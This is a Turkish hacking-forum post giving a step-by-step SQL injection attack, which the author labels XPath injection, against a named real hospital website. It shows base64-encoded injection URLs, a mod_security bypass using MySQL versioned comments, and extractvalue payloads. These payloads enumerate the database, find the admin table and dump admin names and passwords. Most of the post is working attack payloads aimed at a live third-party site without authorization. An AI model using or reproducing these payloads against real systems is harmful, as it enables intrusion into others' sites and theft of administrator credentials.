Konu
:
Manuel Xpath İnjection(Base64)waff bypass denemesi #3
12-04-2021, 05:31:49
#0
Quantaism
Açık Profil bilgileri
Özel Mesaj Gönder
Quantaism tarafından gönderilen tüm mesajları bul
Quantaism'ı arkadaş olarak ekle
Selamun Aleyküm ....
bu konumuzda'da xpath injectiondan bahsedeceğim.. Örnek Sitemiz ;
Kod:
https://www.themissionhospital.com/news-d.php?id=Nw==
şimdi url sonunda gördüğünüz gibi "
news-d.php?id=Nw==
" var,
ben hemen "==" görünce base64 olduğunu anlıyor ve decode ediyorum .
Nw== "7 " sayısını veriyor bize. yani url şu şekilde ;
Kod:
https://www.themissionhospital.com/news-d.php?id=7
Tamam şimdi ' koyalım ve base64 çevirelim.
Kod:
https://www.themissionhospital.com/news-d.php?id=Nyc=
Tamam sql hatamızı da aldık. çok uzatmadan "URL Balancer" denediğim de ekrana direk 7' -- -çıktısı verdi,
bunun üzerine dedim ki eee bu direk benim yazdığımı ekrana yazdırıyor çıktı olarak veriyor ise ya error based'dır, yada xpath dir.
xpath ile database çekmeye çalıştığımda mod_security ile karşılaştım.
Kod:
https://www.themissionhospital.com/news-d.php?id=7and
extractvalue(0x0a,concat(0x0a,(select database())))
Kod:
https://www.themissionhospital.com/n...RhYmFzZSgpKSkp
Waffı bypassladım,
Kod:
https://www.themissionhospital.com/news-d.php?id=7
and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ database())))
Kod:
https://www.themissionhospital.com/n...RhYmFzZSgpKSkp
Tamam db adını öğrendik
Database adı :
themissi_missiondb
sıra geldi tablolarımızı yazdırmaya,
Kod:
https://www.themissionhospital.com/news-d.php?id=
7 and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ table_name /*!50000from*/ /*!50000information_schema*/.tables where table_schema=database() limit 0,1)))
Kod:
https://www.themissionhospital.com/n...1pdCAwLDEpKSkK
şansımıza ilk tablo "mh_admin" sıra geldi kolonlarımızı çekmeye,
Kod:
https://www.themissionhospital.com/news-d.php?id=7
and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ column_name /*!50000from*/ /*!50000information_schema*/.columns where table_name=0x6d685f61646d696e limit 0,1)))
Kod:
https://www.themissionhospital.com/n...l0IDAsMSkpKQ==
Sırayla limit değerini arttırdığımız zaman(0arttırıyoruz) "name" ve "password" kolonunu ulaşmış olduk.
Son işlem sıra geldi dump etmeye,
Kod:
https://www.themissionhospital.com/news-d.php?id=7
and /*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,(/*!50000select*/ /*!50000concat*/(name,0x3a3a,password) from mh_admin limit 0,1)))
Kod:
https://www.themissionhospital.com/n...1pdCAwLDEpKSk=
Evet umarım faydalı bir konu olmuştur sizin içinde..
sağlıcakla kalın...